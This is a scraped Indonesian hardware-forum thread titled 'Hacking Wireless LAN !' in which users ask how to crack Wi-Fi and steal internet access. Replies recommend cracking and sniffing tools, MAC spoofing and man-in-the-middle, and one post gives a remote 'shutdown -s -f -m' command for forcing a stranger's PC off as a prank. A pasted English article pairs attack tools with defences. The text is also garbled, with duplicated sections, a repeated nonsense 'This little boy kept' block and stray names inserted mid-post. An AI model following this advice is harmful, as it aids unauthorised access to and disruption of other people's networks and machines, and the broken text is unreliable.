--------------------------------------------------------------------------------
ikuti ini aja deh... You are not allowed to view links.
Register or Login sdh terlalu tua Linux nya (sbb Auditor sdh susah carinya n dah diganti Backtrack)
tp yakin deh,klo anda mampu mengimplementasikan,wuiiih m
klo utk windows,selain netstumbler pake aja WDRIVER dan AirSnort.jamin isa (klo cuman make
WEP) tp klo targetnya dah make MAC auth ya nyerah deh mas...hehehehe,lum ada yg isa
Logged
--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Modifikasi - Tweak - Overclock PC
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
gini bro, aku kan di kampus pake fasilitas internet.tp pake via pc yang terhubung via LAN. trus
waktu ta' liat ternyata dalam jaringan itu ada juga laptop2 yang terkoneksi via wifi. aku liatnya pake
cmd, trus ta' ketik "net view" keluar tu laptop2nya. bisa ta' hack gak dari pc yang aku pake?
thanks ya...(just curious, don't wanna harm everybody)
Logged
psyCHo_L061c
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to psyCHo_L061c
--------------------------------------------------------------------------------
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie
Logged
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie
wah, mbok saya diajarin mas...lha kan saya masih dibawahnya newbie
hehee
Logged
--------------------------------------------------------------------------------
Order : hyem_toko
Logged
silverx
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 1
Offline
View Inventory
Send Money to silverx
Logged
--------------------------------------------------------------------------------
"Milikilah Sesuatu Menurut Kebutuhan, Bukan menurut Keinginan"....
arwan
Trade Count: (0)
Interest..
Posting Quality: -1
Offline
View Inventory
Send Money to arwan
--------------------------------------------------------------------------------
Netstumbler, Kismet,dan Aeroneet/aeropeek
its stuf...
kalo make kismet kan bisa keliatan mac address nya kalo dia ga aktif bisa kita manfaatkan dengan
mengganti MAC address kita... atau anda mau mencoba "man in the middle"?
agung ack
kalo ada yang punya aeropeek softwarenya mbo aku dibagi... software ku rusak kena jeefo, dan itu
adalah masternya.... kalo download lagi males (trial)
cmiiw
adenan harjono agung
haris nurul mugiroh haris
nina tito
Logged
--------------------------------------------------------------------------------
i have my own journey
lelahana
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to lelahana
--------------------------------------------------------------------------------
sadisssssss....
kckckckckckc....wah semuanyajago pisan..
tapi kalo minta diajarin caranya,ada yang mau ga?
jadi pengen nih...penasaran buanget....tapi ga tau caranya...
ajarin dunks.. :'( :'( :'( :'( :'( :'(
Logged
arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 2
Offline
View Inventory
Send Money to arbangun
aRB'S Coorp
--------------------------------------------------------------------------------
NUAMBAAAHHIIINN...waaakaaakaa .....
pake tu tool, klo ga slh kita bisa dpet pass ama username buat log-on.
hmmm nih ada lagi buat deteksi penyusup komputer bisa jg dicoba pake cara ini nih
Quote
== MENDITEKSI PENYUSUP JARINGAN LEWAT DOS ==
BEGIN
*PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada
yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau
mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat
atau mendetiksinya hanya denga dos command !
Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt
C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.
Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a
C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*
agung
dan aku udah dapat menyusup.
nakan kaht2 :d
C:\WINDOWS\System32>netstat -a
Active Connections
Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .
Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng
atau kalo mau iseng sebentar coba nigh pake rumus ini
Quote
cari taw host name si computer tujuan.. pake angry scan juga bisa.
habis itu ketik deh di command prompt misalnya :
c:/shutdown -s -f -m \\abcd -t 20
habis tu dalam 20 detik, computer client akan shutdown.. keke... :'(
--------------------------------------------------------------------------------
E2140 @3,2 GHz|MOBO Biostar 945G Micro 775SE Ext|A-Data 2x1Gb 800 PC6400|DVD RW
LiteOn|HIS X700Pro IceQ 256/128MB PCIe|LG LCD monitor 21"
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
arwan
Trade Count: (0)
Interest..
Posting Quality: -1
Offline
mufti-
agung
View Inventory
Send Money to arwan
--------------------------------------------------------------------------------
lho mas kalo remote system komputer korban nya ga diaktifin kan ga bisa di shutdown korbannya
dengan perintah C:\shutdown .... cmiiw
yup,ethereal berfungsi membaca (baca:capture) pesan atau data yang mengalir pada jaringan,
sehingga aliran data yang aktif bisa terlihat, apa saja yang dibuka, data apa yang dikirimkan apakah
email,friendster atau semacamnya,tapi tampaknya belum bisa untuk data yang melewati https atau
secure socket layer, betulkan bila saya salah
arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 2
Offline
View Inventory
Send Money to arbangun
aRB'S Coorp
--------------------------------------------------------------------------------
SELENGKAPNYA DARI TAMBAHAN KEMAREN.....BIAR PINTER PAKE BHS. ENGGRIS
YA...
Anyone interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities
will need a good set of base tools with which to work. Fortunately, there are an abundance of free
tools available on the Internet. This list is not meant to be comprehensive in nature but rather to
provide some general guidance on recommended tools to build your toolkit.
Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being
broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login
Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and/or encryption, you may need one of the following tools.
Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.
kaskus
mufti-
agus
This little boy kept mngikuti great wisdom then continue to follow yadi marsudi leksub nanan mufti
abdul where children want to take glasses from which anyone who had haris iksan mugiroh Aminah
wanted to take this kids glasses continue to follow their incredible great haris dian iksan solikin
ahmadi Nunus nuk andi extraordinary isang these children to follow their great leader of
exceptional courage
mufti-
agus
Please register or login
Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.
Ethereal – While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.
The aforementioned utilities, or similar ones, will be necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.
Just as it’s important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.
NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.
Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure
your WLAN is protected by using advanced Authentication and Encryption
Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).
Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of residing in a dictionary file that would be used to try and guess your key and/or would
take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to
protect the authentication and limit the amount of incorrect guesses that would take place before the
account is locked-out. If using certificate-like functionality, it could also validate the remote system
trying to gain access to the WLAN and not allow a rogue system access.
This little boy kept
mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage
This little boy kept
mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage
This little boy kept
mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage
ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.
Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Logged
jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #15 on: April 16, 2007, 10:42:34 PM »
--------------------------------------------------------------------------------
Ato pke cara fuzzing
Yg ini lebih santai, lebih "sopan"..
Yg jelas gak cmn berguna buat WLAN doang..
Logged
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
kalo yang MAC adress, bukannya ada tuh software buat ganti MAC adress??
ada yang pernah coba blom?kan enak tu kalo bisa diganti, bisa berjam-jam akses gratis....hehee
kalo ndak salah, dulu saya juga pernah mbaca artikel sejenis. ya kabelnya kan diikat ke antena
WLAN. gak tau deh, kalo WLAN yang gak pake antena bisa apa ndak.jadi bukan pake usb,
serial.kalo ndak salah kan diameter kalengnya juga harus disesuaikan to?
Logged
Panji
[Here To Help]
[ SupeR ADMIN ]
Trade Count: (2)
[ HYPER ]
Posting Quality: 72
Offline
View Inventory
Send Money to Panji
--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!
Logged
--------------------------------------------------------------------------------
just trying to serve You...
You are not allowed to view images.
Please register or login
work as hard as U can.. and .. be as simple as U can, to be part of Others!
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #18 on: April 19, 2007, 03:19:49 PM »
--------------------------------------------------------------------------------
WEP Crack bisa anda baca di HyperMedia Magazine edisi 2.
Logged
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
bro semua, mo nanya nih, kalo lewat cain and abel dah dapet ip adress, port, ama SSID, trus gimana
biar bisa nge-remote komputer tujuan??
Logged
aghya
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 0
Offline
View Inventory
Send Money to aghya
--------------------------------------------------------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!
Logged
--------------------------------------------------------------------------------
Venice 3000+ @2600 (daily)..so far
DFI LP UT NF4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa Geforce 6600 GT
Samsung SATA 80
EXtreme 500
inou
nubi all the time... :D
[ Community Member ]
Trade Count: (2)
[ EXTREME ]
Posting Quality: 1
Offline
View Inventory
Send Money to inou
.: Lets Fill The World With Smile :.
--------------------------------------------------------------------------------
halow sadayana,ada yg punya AirPcap yg full ndak?bagi donk
Logged
--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
OFFICIAL TEAM:
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or loginYou are not allowed to view images.
Please register or login
@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]
View Inventory
Send Money to @5ph@lt
--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!
Logged
--------------------------------------------------------------------------------
Sempron LE1150 I Abit NF-M2S I Elixir DDR2 667 1Gx2 I WDC 40GB I Seagate 120GB I BenQ
DW2000 I Simbokde 500W PPFC I Thermaltake iFlash 120mm I Compaq S510 15"
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
1b3l_jubel
Trade Count: (0)
Interest..
Posting Quality: -1
Offline
View Inventory
Send Money to 1b3l_jubel
--------------------------------------------------------------------------------
tak coba dah.......
Logged
@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]
View Inventory
Send Money to @5ph@lt
--------------------------------------------------------------------------------
hyem ga jadi keluarin distro ya?
Logged
GoogleTagged: netstat socket windows abit merubah wireshark kampus source enkripsi address
online hak org clien kita apa coding tool netview sofware
« previous next »
Jump to: Please select a destination: ----------------------------- == T H E - C O R E == [OFFICIAL
BOARD] ----------------------------- => Official FAQ, Rules, & Forum Guide => Official Event =>
Official Folding/Grid Team [Hyper-GRID] => Official Merchandise => REVIEW ===> Mainboard
Review ===> Memory Review ===> Display Card Review ===> CPU Review ===> Pheriperal
Review ===> Software Review ===> Games Review => News & Live Chat Discuss ! ===>
Hardware News & Articles ===> Software News & Articles ===> Games News & Articles =>
Online Store & Pricelist (JUST ENABLED ;) ) ===> Intel System ===> AMD System ===> |
HYEM PURWOREJO | ===> | HYEM PALEMBANG | ----------------------------- == HYPER
X-3ME [ADVANCED & SPECIALIST] == |only in English| ----------------------------- => =
WORLD RECORD ADICT = => =| X-3ME Suicide Overclocking Championship |= ===> SuperPi
Team ===> Sisoftsandra Team ===> PC Mark Team ===> 3DMark Team ===> Aquamark Team
===> Mainboard Moding ----------------------------- == H A R D W A R E==
----------------------------- => Basic System Troubleshooting, PC System & Overclocking Guide =>
PC Modding => Processor ===> AMD ===> INTEL => Mainboard ===> Abit => Memory ===>
ADATA => Power Supply ===> FSP => Display Card ===> POV => Optical & Storages =>
Cooling => Sound & Speaker Devices => Pheriperal & Network => Notebook & PDA
----------------------------- == S O F T W A R E== ----------------------------- => Games ===> Games
F.A.Q. ===> Game Cheat & Trainer ===> Multiplayer Game => Operating System ===> Windows
===> Linux ===> Macintosh => Programing => Security => Audio Freak => Webmastering => 2D
Designer and Animation [FOTO-VIDEO] => 3D Modelling and Animation => Other Importance
Software ===> BIOS & ROM ===> Driver ===> Overclocking Tools ----------------------------- ==
ADD-ON BOARD == ----------------------------- => HOBBY ===> Angkringan Ruwet x2 ===>
Angkringan Ngakak
Permissions
--------------------------------------------------------------------------------
BBCode Enabled
Smilies Enabled
[img] Enabled
HTML Enabled
Home Forum Help Arcade Calendar Shop LIVE CHAT GoogleTagged Login Register
button
The Unordinary
Masukkan istilah pencarian Anda
Web hyem.org
Kirim formulir pencarian
PALIT HD4870
PALIT HD4870 Sonic Dual Edition DDR5, 512MB, 256bit 775/4000 Dual OC Speed (dalam
beberapa hal grafis 256bit ini masih lbh unggul dr 5770 128bit, apalagi kalo kita lihat dari
price/performancenya)
PROMO : $150
PALIT HD4850
PALIT HD4830 DDR3, 512MB, 256bit, Core:575/ Mem:1800Mhz + HDMI
Dgn DDR3, Kartu High-end legendaris ini adalah High-end display Card dibawah $100, khusus
bagi yg suka OC.. This babe is the Most Value King!
PROMO:$78, 512M:$65
ALL AVAILAVBE
Chat Now!
[more]
Last 20 Shouts:
--------------------------------------------------------------------------------
Panji
Today at 01:44:28 AM
Selamat buat Hendy hyem.. ganyangka lu menang bro..
an35
Today at 12:50:18 AM
ayo kita kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
sepi mas dab...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do yang"an :p
B.U.G.S
Yesterday at 05:05:04 PM
@Tito Haga
kan iso nge-move tp ga nggo redirection, dadi ga metu MOVED.. MOVED.. ngunu marai MOMED
wae.. wakakaka..
coolwin
Yesterday at 04:58:26 PM
CEK UPDATE BEST KILL hari ini CF!!!!! SAYA DI PERINGKAT 2 WAKAKAKAKAKA
Tito Haga
Yesterday at 02:51:11 PM
@BUGS
hahahaha...sori2..bar tangi turu ngemoved ya ngono kui...haha
donkey
Yesterday at 01:57:41 PM
wakakakaka....
blackshield™
Yesterday at 11:54:06 AM
cilukkkkkkkk
baaaaaaa...
B.U.G.S
Yesterday at 10:39:35 AM
buset, isine kok ming moved kabeh kie..? nek nge-move topik lawas mending ga usah dikei
redirection kang..
Tito Haga
Yesterday at 08:26:27 AM
wakakakakka...senasib berati
sadnux
Yesterday at 08:20:42 AM
bukan soal bersih2 nya, tp itu lho tulisan yg di sign yg soal kuliah
ortu sering ngomong kek gitu kl pas marahin ane T_T
Tito Haga
Yesterday at 08:13:04 AM
Hahahahaha...maap2 ya...kesalahan teknis tadi le bersih2...jadi ngemovednya salah kamr jugah ::
sadnux
Yesterday at 08:09:47 AM
pagi yg indah..tp langsung ketendang sama signaturenya pak dito
wakakakak
Tito Haga
Yesterday at 07:56:09 AM
pagi kang
sadnux
Yesterday at 07:47:53 AM
met pagi semua
Tito Haga
Yesterday at 06:34:29 AM
weh...kang panji onlen
Panji
Yesterday at 06:13:51 AM
miss u all...
Tito Haga
Yesterday at 05:30:56 AM
Ndalu geng
Polling
Lates Post
Beli fingerboard dimana y... by vheebhee [Today at 03:46:23 AM]
Mo Tanya Lagi Niy.. Boleh... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
TOLONG PENJELASAN MENGENA... by botaxalim [Today at 01:54:06 AM]
Update 5 Maret 2010 Cross... by botaxalim [Today at 01:36:16 AM]
[ASK] Membangun Jaringan by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot... by Hazzan [Today at 12:24:06 AM]
guitar hero pc maen pake ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Karya 3D Buatan An... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie unru... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] Intel 915GAV Tit 3x... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 AM]
Sesuaikan DDR3 anda...!!! by masYogo [Yesterday at 05:18:00 AM]
[review] HaPe Modem "smar... by frozr_man [Yesterday at 05:08:18 AM]
AMD VS INTEL < FIGHT ! > by didit_catro' [Yesterday at 04:15:54 AM]
[Ask About] Garansi proci... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] Cara mbungkam Fan b... by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Adu Kreativitas Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10884
Latest: Ricko
Stats
Total Posts: 102876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP
berang_berang
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline
View Inventory
Send Money to berang_berang
Topic starter
--------------------------------------------------------------------------------
Kalo kita mau hack w.LAN tools2 standard apa yg kita butuhin, dan caranya gmana ?
Trus kalo pake linux tools yg disarankan apa ? kalo windows apa ?
Kalo mau nyolong koneksi internet gmana ?
Logged
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #1 on: March 13, 2006, 01:02:12 PM »
--------------------------------------------------------------------------------
netstumbler & kismet buat nyari AP atau SSID yg aktif & airsnort buat ngecrack passwordnya...
manual instalasinya & tutorialnya googling aja. Kalo berhasil jgn lupa share passwordnya...........
Logged
The Unordinary Community Re: Hacking Wireless LAN !
« Reply #1: March 13, 2006, 01:02:12 PM »
--------------------------------------------------------------------------------
Logged
RooTrick
[ Community Member ]
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline
View Inventory
Send Money to RooTrick
--------------------------------------------------------------------------------
tuh download dmn om?
trus kalo uda dapet source code na bikin aplikasi na gmn???
thx bgt...
:mrgreen:
Logged
--------------------------------------------------------------------------------
Let the world revolves around me...
densinyo
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 0
Offline
Last Login:February 28, 2010, 12:54:59 AM
Posts: 133
HY$353.00 credits
View Inventory
Send Money to densinyo
--------------------------------------------------------------------------------
DL dmn tuh...boleh dong minta linknya...
Logged
--------------------------------------------------------------------------------
T-Force 550 ! Athlon64 X2 4000+ ! Adata 2gb ! Acbel 400w ! WDC 500gb ! DVD RW Pioneer !
DVD Lite-On ! A4Tech
-=-peduli lingkungan mulai dari diri sendiri-=-
081-5612-7812
--------------------------------------------------------------------------------
Logged
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #4 on: March 21, 2006, 03:09:47 PM »
--------------------------------------------------------------------------------
Aku lg ada proyek nih,bikin antena kaleng buat nembak WiFinya YKPN, ada yg pernah punya
pengalaman ga bkin antena kaleng?
Cari alat n bahannya ada yg tau ga?
Ini ada sdikit tutorialnya kalo pd berminat :
You are not allowed to view links.
Register or Login
Logged
MAS
[OprekPC]
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline
View Inventory
Send Money to MAS
--------------------------------------------------------------------------------
ikuti ini aja deh... You are not allowed to view links.
Register or Login sdh terlalu tua Linux nya (sbb Auditor sdh susah carinya n dah diganti Backtrack)
tp yakin deh,klo anda mampu mengimplementasikan,wuiiih mudah banged.
klo utk windows,selain netstumbler pake aja WDRIVER dan AirSnort.jamin isa (klo cuman make
WEP) tp klo targetnya dah make MAC auth ya nyerah deh mas...hehehehe,lum ada yg isa
Logged
--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Modifikasi - Tweak - Overclock PC
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
gini bro, aku kan di kampus pake fasilitas internet.tp pake via pc yang terhubung via LAN. trus
waktu ta' liat ternyata dalam jaringan itu ada juga laptop2 yang terkoneksi via wifi. aku liatnya pake
cmd, trus ta' ketik "net view" keluar tu laptop2nya. bisa ta' hack gak dari pc yang aku pake?
thanks ya...(just curious, don't wanna harm everybody)
Logged
psyCHo_L061c
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to psyCHo_L061c
--------------------------------------------------------------------------------
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie
Logged
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
Last Login:September 20, 2008, 02:39:26 PM
Posts: 1103
HY$444.00 credits
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie
wah, mbok saya diajarin mas...lha kan saya masih dibawahnya newbie
hehee
Logged
--------------------------------------------------------------------------------
Order : hyem_toko
Logged
silverx
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 1
Offline
View Inventory
Send Money to silverx
--------------------------------------------------------------------------------
tools ini bisa sangant berguna untuk browsing sema yang masuk sebuah jaringan, Cain And Abel
cari lewat google aj.... pasti dapat, install dan jalankan, disitu anda bisa membuka kompi-kompi
yang adapada jaringan, meskipun worgroupnya berbeda...........................
aku bingung buat antena yang ada tutorinya diatas, konek ke PCnya ake port apaan??? pake serial?
ato pake USB?? kan ditutorial cuman antenanya doang!!!!!!!!!!!1
Logged
--------------------------------------------------------------------------------
"Milikilah Sesuatu Menurut Kebutuhan, Bukan menurut Keinginan"....
arwan
Trade Count: (0)
Interest..
Posting Quality: -1
Offline
View Inventory
Send Money to arwan
--------------------------------------------------------------------------------
Netstumbler, Kismet,dan Aeroneet/aeropeek
its stuf...
kalo make kismet kan bisa keliatan mac address nya kalo dia ga aktif bisa kita manfaatkan dengan
mengganti MAC address kita... atau anda mau mencoba "man in the middle"?
kalo ada yang punya aeropeek softwarenya mbo aku dibagi... software ku rusak kena jeefo, dan itu
adalah masternya.... kalo download lagi males (trial)
cmiiw
Logged
--------------------------------------------------------------------------------
i have my own journey
lelahana
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to lelahana
--------------------------------------------------------------------------------
sadisssssss....
kckckckckckc....wah semuanyajago pisan..
tapi kalo minta diajarin caranya,ada yang mau ga?
jadi pengen nih...penasaran buanget....tapi ga tau caranya...
ajarin dunks.. :'( :'( :'( :'( :'( :'(
Logged
arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 2
Offline
Last Login:October 19, 2009, 02:03:55 PM
Posts: 130
HY$40.00 credits
View Inventory
Send Money to arbangun
aRB'S Coorp
--------------------------------------------------------------------------------
NUAMBAAAHHIIINN...waaakaaakaa .....
pake tu tool, klo ga slh kita bisa dpet pass ama username buat log-on.
hmmm nih ada lagi buat deteksi penyusup komputer bisa jg dicoba pake cara ini nih
Quote
== MENDITEKSI PENYUSUP JARINGAN LEWAT DOS ==
BEGIN
*PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada
yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau
mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat
atau mendetiksinya hanya denga dos command !
Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
